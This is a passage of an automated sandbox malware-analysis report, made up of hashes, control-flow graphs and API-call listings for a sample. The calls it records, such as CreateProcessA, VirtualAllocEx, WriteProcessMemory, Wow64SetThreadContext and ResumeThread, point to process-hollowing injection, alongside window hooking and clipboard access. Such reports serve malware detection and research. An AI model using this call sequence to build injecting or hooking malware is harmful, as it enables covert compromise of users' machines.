                                                                    control_flow_graph 659 66375e8-663767d 661 66376b6-66376d6 659->661 662 663767f-6637689 659->662 667 66376d8-66376e2 661->667 668 663770f-663773e 661->668 662->661 663 663768b-663768d 662->663 665 66376b0-66376b3 663->665 666 663768f-6637699 663->666 665->661 669 663769b 666->669 670 663769d-66376ac 666->670 667->668 671 66376e4-66376e6 667->671 678 6637740-663774a 668->678 679 6637777-6637831 CreateProcessA 668->679 669->670 670->670 672 66376ae 670->672 673 6637709-663770c 671->673 674 66376e8-66376f2 671->674 672->665 673->668 676 66376f6-6637705 674->676 677 66376f4 674->677 676->676 680 6637707 676->680 677->676 678->679 681 663774c-663774e 678->681 690 6637833-6637839 679->690 691 663783a-66378c0 679->691 680->673 683 6637771-6637774 681->683 684 6637750-663775a 681->684 683->679 685 663775e-663776d 684->685 686 663775c 684->686 685->685 687 663776f 685->687 686->685 687->683 690->691 701 66378c2-66378c6 691->701 702 66378d0-66378d4 691->702 701->702 705 66378c8 701->705 703 66378d6-66378da 702->703 704 66378e4-66378e8 702->704 703->704 706 66378dc 703->706 707 66378ea-66378ee 704->707 708 66378f8-66378fc 704->708 705->702 706->704 707->708 709 66378f0 707->709 710 663790e-6637915 708->710 711 66378fe-6637904 708->711 709->708 712 6637917-6637926 710->712 713 663792c 710->713 711->710 712->713 714 663792d 713->714 714->714
                                                                    APIs
                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0663781E
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID:
                                                                    • API String ID: 963392458-0
                                                                    • Opcode ID: 06d0a8f473b86be98beda980745af9c12518d555ee23e6d4308ed0d77c473a77
                                                                    • Instruction ID: 961046c58d44f2d08ec09f908d99015ce67bd51a1f2bfd689ad940b1b23f3167
                                                                    • Opcode Fuzzy Hash: 06d0a8f473b86be98beda980745af9c12518d555ee23e6d4308ed0d77c473a77
                                                                    • Instruction Fuzzy Hash: 4C917BB1D00229DFDB64DF69C840BEEBBB2FF49310F14856AE818A7240DB749985CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 824 31249dc-3125f01 CreateActCtxA 827 3125f03-3125f09 824->827 828 3125f0a-3125f64 824->828 827->828 835 3125f73-3125f77 828->835 836 3125f66-3125f69 828->836 837 3125f88 835->837 838 3125f79-3125f85 835->838 836->835 840 3125f89 837->840 838->837 840->840
                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 03125EF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2139255628.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3120000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: 5ab5d17c6b1f7d4980f50c2ed1a000f83168f8059fbb9e507f2fde19fc997cc1
                                                                    • Instruction ID: e053a8a61bb40804ae8a1070f4d59e922dd186dfb52e334d2393f243350feee5
                                                                    • Opcode Fuzzy Hash: 5ab5d17c6b1f7d4980f50c2ed1a000f83168f8059fbb9e507f2fde19fc997cc1
                                                                    • Instruction Fuzzy Hash: 3B41E2B0C0062DCBDB24CFA9C884B9DFBB6BF49304F24806AD419AB255DB756945CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 841 3125e34-3125f01 CreateActCtxA 843 3125f03-3125f09 841->843 844 3125f0a-3125f64 841->844 843->844 851 3125f73-3125f77 844->851 852 3125f66-3125f69 844->852 853 3125f88 851->853 854 3125f79-3125f85 851->854 852->851 856 3125f89 853->856 854->853 856->856
                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 03125EF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2139255628.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3120000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: 42b76eec3510475b9d6a61a9206b69c6fa5201249fe89dc6693629bcf7508bc8
                                                                    • Instruction ID: d08a9c43f904cc93f40aec403e77fae77ffa3ccffadcb52ef5787cd5326035ff
                                                                    • Opcode Fuzzy Hash: 42b76eec3510475b9d6a61a9206b69c6fa5201249fe89dc6693629bcf7508bc8
                                                                    • Instruction Fuzzy Hash: 9241EFB1C00629CFDB24CFA9C984B9DFBB2BF49304F24805AD418AB254DB755946CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 857 6637358-66373ae 859 66373b0-66373bc 857->859 860 66373be-66373fd WriteProcessMemory 857->860 859->860 862 6637406-6637436 860->862 863 66373ff-6637405 860->863 863->862
                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 066373F0
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
                                                                    • Opcode ID: 99bc8bb523f78fda6bf0cfdce04b25d118b1f040e7bf4136f122014119632ec7
                                                                    • Instruction ID: 0b7113708ff27da6c2fa4a87c65dacab24c67d3a3fbcb2eb378619d4cef722b6
                                                                    • Opcode Fuzzy Hash: 99bc8bb523f78fda6bf0cfdce04b25d118b1f040e7bf4136f122014119632ec7
                                                                    • Instruction Fuzzy Hash: 162135B5D002199FDB10CFA9C880BEEBBF5FF88310F10842AE919A7240C7789941CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 877 663b7f8-663b7fa 878 663b7fd-663b86a PostMessageW 877->878 879 663b7fc 877->879 882 663b873-663b887 878->882 883 663b86c-663b872 878->883 879->878 880 663b7c1-663b7cf 879->880 884 663b7d1-663b7d7 880->884 885 663b7d8-663b7ec 880->885 883->882 884->885
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 0663B85D
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost
                                                                    • String ID:
                                                                    • API String ID: 410705778-0
                                                                    • Opcode ID: 271db4aae48d0356b279a9cb227e7e6a98dab87ca348c01e068096d03be389a5
                                                                    • Instruction ID: 2d5da5f64ba08d058d4065ec78975f76e6ad612620c5e3b43b269108a2cc46b4
                                                                    • Opcode Fuzzy Hash: 271db4aae48d0356b279a9cb227e7e6a98dab87ca348c01e068096d03be389a5
                                                                    • Instruction Fuzzy Hash: F22116B68002189EDB60DF99D849BDEBBF8EB58324F20845AD518A7610C379A544CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 867 6637360-66373ae 869 66373b0-66373bc 867->869 870 66373be-66373fd WriteProcessMemory 867->870 869->870 872 6637406-6637436 870->872 873 66373ff-6637405 870->873 873->872
                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 066373F0
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
                                                                    • Opcode ID: 4dc4e99d8117bdcb2c9eb595877c40b38bb118971b7fc4de9b92480a8e1cbf6e
                                                                    • Instruction ID: 4b65533f502464449967ccde8580b392b98472b9710a234901828ccf311befbb
                                                                    • Opcode Fuzzy Hash: 4dc4e99d8117bdcb2c9eb595877c40b38bb118971b7fc4de9b92480a8e1cbf6e
                                                                    • Instruction Fuzzy Hash: 3F21F6B59003599FDB10DFA9C885BEEBBF5FF48310F108429E919A7240C778A944CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 066374D0
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead
                                                                    • String ID:
                                                                    • API String ID: 1726664587-0
                                                                    • Opcode ID: 9bf2c5cbae04bda019e1177fa0ec084ee728c8b7f56e3c569d48f51901582084
                                                                    • Instruction ID: 8d49ca1c60a806cd1273d92ce08a9a0ac70845ad6e8bed92d31eee3b398228c0
                                                                    • Opcode Fuzzy Hash: 9bf2c5cbae04bda019e1177fa0ec084ee728c8b7f56e3c569d48f51901582084
                                                                    • Instruction Fuzzy Hash: E72116B1C002599FDB10DFAAC881AEEFBF5FF48310F508429E519A7251C778A541CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 066374D0
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead
                                                                    • String ID:
                                                                    • API String ID: 1726664587-0
                                                                    • Opcode ID: 4fb060d4b0f9259c77a117e082f14eb660970b03065a5a85e1b0a8710dc84229
                                                                    • Instruction ID: 063ebda48f40a957b2c546a1f02bc1d77b74e59166cb0daf9854dbd29e01dae0
                                                                    • Opcode Fuzzy Hash: 4fb060d4b0f9259c77a117e082f14eb660970b03065a5a85e1b0a8710dc84229
                                                                    • Instruction Fuzzy Hash: B12128B1C003599FCB10DFAAC880AEEFBF5FF48310F508429E519A7240C778A540CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06637246
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: ContextThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 983334009-0
                                                                    • Opcode ID: 06a476fcbbcd4eb1efe39522ef80da1068579b6732bb7ce53fe0cca23b88e693
                                                                    • Instruction ID: 4d8dcd2f95f5b9ac49d6d9941832b2450d0bc3427b9a7945642633333585c8a3
                                                                    • Opcode Fuzzy Hash: 06a476fcbbcd4eb1efe39522ef80da1068579b6732bb7ce53fe0cca23b88e693
                                                                    • Instruction Fuzzy Hash: EE2137B1D002098FDB50DFAAC585BEEBBF4EF88320F148429D519A7240CB789944CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0663730E
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: a5e082bd5bc6ee734f1c33dbde813379797875c4ec3d3ef288b3560c3aff55e4
                                                                    • Instruction ID: 0319ea5d84e1d3d3ebd0006a7e10f06a92548c552572fd84d4024aeede31a8e4
                                                                    • Opcode Fuzzy Hash: a5e082bd5bc6ee734f1c33dbde813379797875c4ec3d3ef288b3560c3aff55e4
                                                                    • Instruction Fuzzy Hash: 6C115CB18002499FDB20DFAAC844ADFBFF5FF88320F148819E519A7250CB799940CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0663730E
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 8ba8884342e0a31d272ce9320e88fb609c1a9626d76cdb41014b245a705c9d09
                                                                    • Instruction ID: 1b8a9763b8ee32c6b34e003123fda801f38c05f0adb345479bad9007b128e8f1
                                                                    • Opcode Fuzzy Hash: 8ba8884342e0a31d272ce9320e88fb609c1a9626d76cdb41014b245a705c9d09
                                                                    • Instruction Fuzzy Hash: DD1129B18002499FDB10DFAAC844ADEBFF5EF48310F148419D519A7250C7799940CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    • Opcode ID: f395c59fc61863cadadf64a32d885302f10363a49eab4659e99022ff2f08ada8
                                                                    • Instruction ID: 9c628373f871a410e9579053984d9a452f123b506be20684876518dab0c1bd80
                                                                    • Opcode Fuzzy Hash: f395c59fc61863cadadf64a32d885302f10363a49eab4659e99022ff2f08ada8
                                                                    • Instruction Fuzzy Hash: CB112BB1D002498EDB24DFAAC4457EEFFF5EF88324F248419D419A7240CB795545CFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    • Opcode ID: 873548cc07589c00d22aed0348aff0259cec4209e17df40c6d41d09abd98c401
                                                                    • Instruction ID: 48641fc8a4dccd478a2a77f74bd7219ef00860b70b949dd03edc084fc73a0876
                                                                    • Opcode Fuzzy Hash: 873548cc07589c00d22aed0348aff0259cec4209e17df40c6d41d09abd98c401
                                                                    • Instruction Fuzzy Hash: 6F1128B1D003498BDB20DFAAC8457EEFBF5EF89324F248419D519A7240CB79A544CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 0663B85D
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost
                                                                    • String ID:
                                                                    • API String ID: 410705778-0
                                                                    • Opcode ID: bdb6fb4ef848bdcf78aabd4259be18bbba4260630631ba887d5afe6dcebd4f96
                                                                    • Instruction ID: 8db308b690936264a99daf37d56fd2cc1a8d7a514a9efa884320fd60d70c5dca
                                                                    • Opcode Fuzzy Hash: bdb6fb4ef848bdcf78aabd4259be18bbba4260630631ba887d5afe6dcebd4f96
                                                                    • Instruction Fuzzy Hash: E511F5B58003599FDB60DF99D885BDEFBF8FB58320F10841AE519A7240C3B9A944CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2138844504.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_170d000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 88c308c137222a2434a8075d6eca309a3107fd3348e20f52a9132c38ab140148
                                                                    • Instruction ID: 0d78b4ffc777d0f678bf5beb118e1128cf0cbc1ac3837921962c47546e0a16e6
                                                                    • Opcode Fuzzy Hash: 88c308c137222a2434a8075d6eca309a3107fd3348e20f52a9132c38ab140148
                                                                    • Instruction Fuzzy Hash: B931B37554C380CFD713CFA4D994715BFB1EF46214F19C5EAC4498B2A3C27A8806CB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2138844504.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_170d000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 72e8bfd04d6f9b4e71d781f6526217cd301245c375ce510b0f0609071f433e12
                                                                    • Instruction ID: 98b51d109ec05d03a28026019e0c1f9bef3ba6e763a36acc022f9834dfaa76db
                                                                    • Opcode Fuzzy Hash: 72e8bfd04d6f9b4e71d781f6526217cd301245c375ce510b0f0609071f433e12
                                                                    • Instruction Fuzzy Hash: 61318D71548380CFD713CFA4D994715BFB1EF46214F19C5EAD8898B2A7C33A980ACB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2138844504.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_170d000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a53c73b7f3a431b53d27009b1fee154c9748dda34346c660f7172043b8c7c79a
                                                                    • Instruction ID: 44a3bdcadaeef8d90f4624658e9627755b9aeca355100aa7f67481d103556b93
                                                                    • Opcode Fuzzy Hash: a53c73b7f3a431b53d27009b1fee154c9748dda34346c660f7172043b8c7c79a
                                                                    • Instruction Fuzzy Hash: 7E210371604304DFCB16DFD8C980B26FBA5FB88324F20C5A9D8090B292C37AD806CA61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2138844504.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_170d000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 89e791c4825afc3ee3b729e75010f0af4a4ad7bc332fe38197b118966ed82678
                                                                    • Instruction ID: 21990d73e12bb650aaee448cbdfd8f1ec54e46f7b14c6f66e3c954bf65395bed
                                                                    • Opcode Fuzzy Hash: 89e791c4825afc3ee3b729e75010f0af4a4ad7bc332fe38197b118966ed82678
                                                                    • Instruction Fuzzy Hash: 8C21D371504304DFDB16DF98D980B26FBA5EB84314F20C5A9D9094B296C73AD846CA61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2138844504.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_170d000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                    • Instruction ID: f03570d7ecbd7d3aaf344e721f9828343366e44e72ded0d6c1ab3020bde17cd6
                                                                    • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                    • Instruction Fuzzy Hash: DF11BB75504380CFDB12CF94D9C4B15FFA1FB84214F24C6A9D8494B292C33AD44ACB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:11%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:150
                                                                    Total number of Limit Nodes:19
                                                                    execution_graph 39704 134d044 39705 134d05c 39704->39705 39706 134d0b6 39705->39706 39711 6d40884 39705->39711 39719 6d42743 39705->39719 39723 6d46ed1 39705->39723 39732 6d42750 39705->39732 39712 6d4088f 39711->39712 39713 6d46f61 39712->39713 39715 6d46f51 39712->39715 39748 6d45edc 39713->39748 39736 6d47087 39715->39736 39742 6d47088 39715->39742 39716 6d46f5f 39716->39716 39720 6d42747 39719->39720 39721 6d40884 3 API calls 39720->39721 39722 6d42797 39721->39722 39722->39706 39724 6d46eda 39723->39724 39726 6d46eea 39723->39726 39724->39706 39725 6d46f61 39727 6d45edc 3 API calls 39725->39727 39726->39725 39728 6d46f51 39726->39728 39729 6d46f5f 39727->39729 39730 6d47087 3 API calls 39728->39730 39731 6d47088 3 API calls 39728->39731 39729->39729 39730->39729 39731->39729 39733 6d42776 39732->39733 39734 6d40884 3 API calls 39733->39734 39735 6d42797 39734->39735 39735->39706 39738 6d47088 39736->39738 39737 6d45edc 3 API calls 39737->39738 39738->39737 39739 6d4716e 39738->39739 39755 6d47551 39738->39755 39760 6d47560 39738->39760 39739->39716 39744 6d47096 39742->39744 39743 6d45edc 3 API calls 39743->39744 39744->39743 39745 6d4716e 39744->39745 39746 6d47560 2 API calls 39744->39746 39747 6d47551 2 API calls 39744->39747 39745->39716 39746->39744 39747->39744 39749 6d45ee7 39748->39749 39750 6d47274 39749->39750 39751 6d471ca 39749->39751 39753 6d40884 2 API calls 39750->39753 39752 6d47222 CallWindowProcW 39751->39752 39754 6d471d1 39751->39754 39752->39754 39753->39754 39754->39716 39756 6d47556 39755->39756 39757 6d47546 39756->39757 39765 6d47b07 39756->39765 39771 6d47b18 39756->39771 39757->39738 39761 6d4756c 39760->39761 39762 6d47546 39761->39762 39763 6d47b07 2 API calls 39761->39763 39764 6d47b18 2 API calls 39761->39764 39762->39738 39763->39761 39764->39761 39766 6d47b18 39765->39766 39767 6d47b34 39766->39767 39777 6d47b60 39766->39777 39789 6d47b51 39766->39789 
39767->39756 39768 6d47b49 39768->39756 39773 6d47b20 39771->39773 39772 6d47b34 39772->39756 39773->39772 39775 6d47b60 2 API calls 39773->39775 39776 6d47b51 2 API calls 39773->39776 39774 6d47b49 39774->39756 39775->39774 39776->39774 39778 6d47b72 39777->39778 39779 6d47b8d 39778->39779 39781 6d47bd1 39778->39781 39787 6d47b60 2 API calls 39779->39787 39788 6d47b51 2 API calls 39779->39788 39780 6d47b93 39780->39768 39782 6d47c51 39781->39782 39801 6d47e18 39781->39801 39805 6d47e28 39781->39805 39809 6d47ec4 39781->39809 39782->39768 39783 6d47c6f 39783->39768 39787->39780 39788->39780 39790 6d47b5a 39789->39790 39791 6d47b8d 39790->39791 39793 6d47bd1 39790->39793 39799 6d47b60 2 API calls 39791->39799 39800 6d47b51 2 API calls 39791->39800 39792 6d47b93 39792->39768 39795 6d47c51 39793->39795 39796 6d47ec4 OleGetClipboard 39793->39796 39797 6d47e18 OleGetClipboard 39793->39797 39798 6d47e28 OleGetClipboard 39793->39798 39794 6d47c6f 39794->39768 39795->39768 39796->39794 39797->39794 39798->39794 39799->39792 39800->39792 39803 6d47e28 39801->39803 39804 6d47e63 39803->39804 39814 6d478f0 39803->39814 39804->39783 39807 6d47e2e 39805->39807 39806 6d478f0 OleGetClipboard 39806->39807 39807->39806 39808 6d47e63 39807->39808 39808->39783 39810 6d47ece OleGetClipboard 39809->39810 39812 6d47e7f 39809->39812 39813 6d47f6a 39810->39813 39812->39783 39815 6d47ed0 OleGetClipboard 39814->39815 39817 6d47f6a 39815->39817 39682 6d462f0 39683 6d462f6 DuplicateHandle 39682->39683 39684 6d46386 39683->39684 39685 6d414f0 39686 6d41532 39685->39686 39687 6d41538 GetModuleHandleW 39685->39687 39686->39687 39688 6d41565 39687->39688 39689 6d49a10 39690 6d49a54 SetWindowsHookExA 39689->39690 39692 6d49a9a 39690->39692 39818 6d47480 39819 6d47488 39818->39819 39821 6d474ab 39819->39821 39822 6d45f34 39819->39822 39823 6d474c0 KiUserCallbackDispatcher 39822->39823 39825 6d4752e 39823->39825 39825->39819 39826 13d0848 39828 13d084e 39826->39828 39827 13d091b 39828->39827 39830 
13d132f 39828->39830 39832 13d1333 39830->39832 39831 13d1434 39831->39828 39832->39831 39834 13d7e58 39832->39834 39835 13d7e62 39834->39835 39836 13d7ea4 39835->39836 39842 6d5f939 39835->39842 39847 6d5f948 39835->39847 39836->39832 39837 13d7e75 39852 13deb09 39837->39852 39857 13deb18 39837->39857 39844 6d5f947 39842->39844 39843 6d5fb72 39843->39837 39844->39843 39845 6d5fb87 GlobalMemoryStatusEx 39844->39845 39846 6d5fde0 GlobalMemoryStatusEx 39844->39846 39845->39844 39846->39844 39849 6d5f953 39847->39849 39848 6d5fb72 39848->39837 39849->39848 39850 6d5fb87 GlobalMemoryStatusEx 39849->39850 39851 6d5fde0 GlobalMemoryStatusEx 39849->39851 39850->39849 39851->39849 39854 13deb18 39852->39854 39853 13ded79 39853->39836 39854->39853 39855 6d5fb87 GlobalMemoryStatusEx 39854->39855 39856 6d5fde0 GlobalMemoryStatusEx 39854->39856 39855->39854 39856->39854 39858 13deb32 39857->39858 39859 13ded79 39858->39859 39860 6d5fb87 GlobalMemoryStatusEx 39858->39860 39861 6d5fde0 GlobalMemoryStatusEx 39858->39861 39859->39836 39860->39858 39861->39858 39693 6d42598 39694 6d42600 CreateWindowExW 39693->39694 39696 6d426bc 39694->39696 39697 6d47d38 39698 6d47d43 39697->39698 39700 6d47d53 39698->39700 39701 6d4608c 39698->39701 39702 6d47d88 OleInitialize 39701->39702 39703 6d47dec 39702->39703 39703->39700

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 6d53070-6d53091 1 6d53093-6d53096 0->1 2 6d530bc-6d530bf 1->2 3 6d53098-6d530b7 1->3 4 6d530c5-6d530e4 2->4 5 6d53860-6d53862 2->5 3->2 13 6d530e6-6d530e9 4->13 14 6d530fd-6d53107 4->14 6 6d53864 5->6 7 6d53869-6d5386c 5->7 6->7 7->1 10 6d53872-6d5387b 7->10 13->14 15 6d530eb-6d530fb 13->15 18 6d5310d-6d5311c 14->18 15->18 126 6d5311e call 6d53890 18->126 127 6d5311e call 6d53888 18->127 19 6d53123-6d53128 20 6d53135-6d53412 19->20 21 6d5312a-6d53130 19->21 42 6d53852-6d5385f 20->42 43 6d53418-6d534c7 20->43 21->10 52 6d534f0 43->52 53 6d534c9-6d534ee 43->53 54 6d534f9-6d5350c 52->54 53->54 57 6d53512-6d53534 54->57 58 6d53839-6d53845 54->58 57->58 61 6d5353a-6d53544 57->61 58->43 59 6d5384b 58->59 59->42 61->58 62 6d5354a-6d53555 61->62 62->58 63 6d5355b-6d53631 62->63 75 6d53633-6d53635 63->75 76 6d5363f-6d5366f 63->76 75->76 80 6d53671-6d53673 76->80 81 6d5367d-6d53689 76->81 80->81 82 6d536e9-6d536ed 81->82 83 6d5368b-6d5368f 81->83 84 6d536f3-6d5372f 82->84 85 6d5382a-6d53833 82->85 83->82 86 6d53691-6d536bb 83->86 96 6d53731-6d53733 84->96 97 6d5373d-6d5374b 84->97 85->58 85->63 93 6d536bd-6d536bf 86->93 94 6d536c9-6d536e6 86->94 93->94 94->82 96->97 100 6d53762-6d5376d 97->100 101 6d5374d-6d53758 97->101 104 6d53785-6d53796 100->104 105 6d5376f-6d53775 100->105 101->100 106 6d5375a 101->106 110 6d537ae-6d537ba 